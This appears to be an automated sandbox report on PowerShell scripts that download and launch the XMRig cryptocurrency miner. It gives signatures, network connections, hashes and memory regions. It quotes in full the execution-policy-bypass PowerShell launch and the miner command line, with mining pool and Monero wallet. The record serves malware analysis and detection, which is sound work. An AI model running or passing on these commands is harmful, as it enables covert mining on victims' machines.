"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/4632-0-0x00007FFAFCB13000-0x00007FFAFCB15000-memory.dmp
memory/4632-1-0x000001A4F5E30000-0x000001A4F5E52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_15ozgwiz.ley.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4632-11-0x00007FFAFCB10000-0x00007FFAFD5D1000-memory.dmp
memory/4632-12-0x00007FFAFCB10000-0x00007FFAFD5D1000-memory.dmp
memory/4632-13-0x00007FFAFCB10000-0x00007FFAFD5D1000-memory.dmp
memory/4632-14-0x00007FFAFCB13000-0x00007FFAFCB15000-memory.dmp
memory/4632-15-0x00007FFAFCB10000-0x00007FFAFD5D1000-memory.dmp
memory/4632-17-0x00007FFAFCB10000-0x00007FFAFD5D1000-memory.dmp
memory/4632-18-0x000001A4F61A0000-0x000001A4F61B2000-memory.dmp
memory/4632-19-0x000001A4DD090000-0x000001A4DD09A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4736-50-0x0000020D76640000-0x0000020D76660000-memory.dmp
memory/4736-51-0x0000020D76690000-0x0000020D766B0000-memory.dmp
memory/4736-52-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-53-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-54-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4632-55-0x00007FFAFCB10000-0x00007FFAFD5D1000-memory.dmp
memory/4736-57-0x0000020D77F80000-0x0000020D77FA0000-memory.dmp
memory/4736-56-0x0000020D766B0000-0x0000020D766D0000-memory.dmp
memory/4736-58-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-59-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-61-0x0000020D77F80000-0x0000020D77FA0000-memory.dmp
memory/4736-60-0x0000020D766B0000-0x0000020D766D0000-memory.dmp
memory/4736-62-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-63-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-64-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-65-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-66-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-67-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-68-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-69-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-70-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-71-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-72-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-73-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-74-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-75-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-76-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-77-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-78-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-79-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-80-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
memory/4736-81-0x00007FF6F4F30000-0x00007FF6F5B63000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win7-20240221-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
Network
Files
memory/2256-4-0x000007FEF5A2E000-0x000007FEF5A2F000-memory.dmp
memory/2256-5-0x000000001B3D0000-0x000000001B6B2000-memory.dmp
memory/2256-7-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2256-6-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/2256-8-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2256-9-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2256-10-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2256-11-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
memory/2256-12-0x000007FEF5770000-0x000007FEF610D000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
292s
Max time network
290s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1636 wrote to memory of 1000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1636 wrote to memory of 1000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/1636-0-0x00007FFD85583000-0x00007FFD85585000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_30xtwvwv.ffc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1636-10-0x000001D4C02B0000-0x000001D4C02D2000-memory.dmp
memory/1636-11-0x00007FFD85580000-0x00007FFD86041000-memory.dmp
memory/1636-12-0x00007FFD85580000-0x00007FFD86041000-memory.dmp
memory/1636-13-0x00007FFD85583000-0x00007FFD85585000-memory.dmp
memory/1636-14-0x00007FFD85580000-0x00007FFD86041000-memory.dmp
memory/1636-15-0x00007FFD85580000-0x00007FFD86041000-memory.dmp
memory/1636-17-0x00007FFD85580000-0x00007FFD86041000-memory.dmp
memory/1636-18-0x000001D4C0280000-0x000001D4C0292000-memory.dmp
memory/1636-19-0x000001D4A7E10000-0x000001D4A7E1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1000-50-0x00000208AF130000-0x00000208AF150000-memory.dmp
memory/1000-51-0x00000208AF180000-0x00000208AF1A0000-memory.dmp
memory/1000-52-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-55-0x00000208B0980000-0x00000208B09A0000-memory.dmp
memory/1000-54-0x00000208B0960000-0x00000208B0980000-memory.dmp
memory/1000-53-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1636-57-0x00007FFD85580000-0x00007FFD86041000-memory.dmp
memory/1000-56-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-58-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-60-0x00000208B0980000-0x00000208B09A0000-memory.dmp
memory/1000-59-0x00000208B0960000-0x00000208B0980000-memory.dmp
memory/1000-61-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-62-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-63-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-64-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-65-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-66-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-67-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-68-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-69-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-70-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-71-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-72-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-73-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-74-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-75-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-76-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-77-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-78-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-79-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-80-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-81-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
memory/1000-82-0x00007FF7B5890000-0x00007FF7B64C3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
299s
Max time network
302s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5116 wrote to memory of 3784 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5116 wrote to memory of 3784 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/5116-4-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/5116-5-0x000001EA34810000-0x000001EA34832000-memory.dmp
memory/5116-8-0x000001EA4CFB0000-0x000001EA4D026000-memory.dmp
memory/5116-9-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lrbz3tpv.zel.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5116-10-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-25-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-29-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/5116-30-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-31-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-64-0x000001EA4CE00000-0x000001EA4CE0A000-memory.dmp
memory/5116-51-0x000001EA4CE20000-0x000001EA4CE32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3784-93-0x000001CA748A0000-0x000001CA748C0000-memory.dmp
memory/3784-94-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-95-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-96-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-97-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-98-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-99-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-100-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-101-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-102-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-103-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-104-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-105-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-106-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-107-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-108-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-109-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-110-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-111-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-112-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-113-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-114-0x00007FF638230000-0x00007FF638E63000-memory.dmp
memory/3784-115-0x00007FF638230000-0x00007FF638E63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
296s
Max time network
298s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4904 wrote to memory of 2300 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4904 wrote to memory of 2300 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
memory/4904-3-0x00007FFFD3123000-0x00007FFFD3124000-memory.dmp
memory/4904-5-0x0000021D77E10000-0x0000021D77E32000-memory.dmp
memory/4904-8-0x00007FFFD3120000-0x00007FFFD3B0C000-memory.dmp
memory/4904-9-0x0000021D77F40000-0x0000021D77FB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwpe1v3s.5xm.ps1
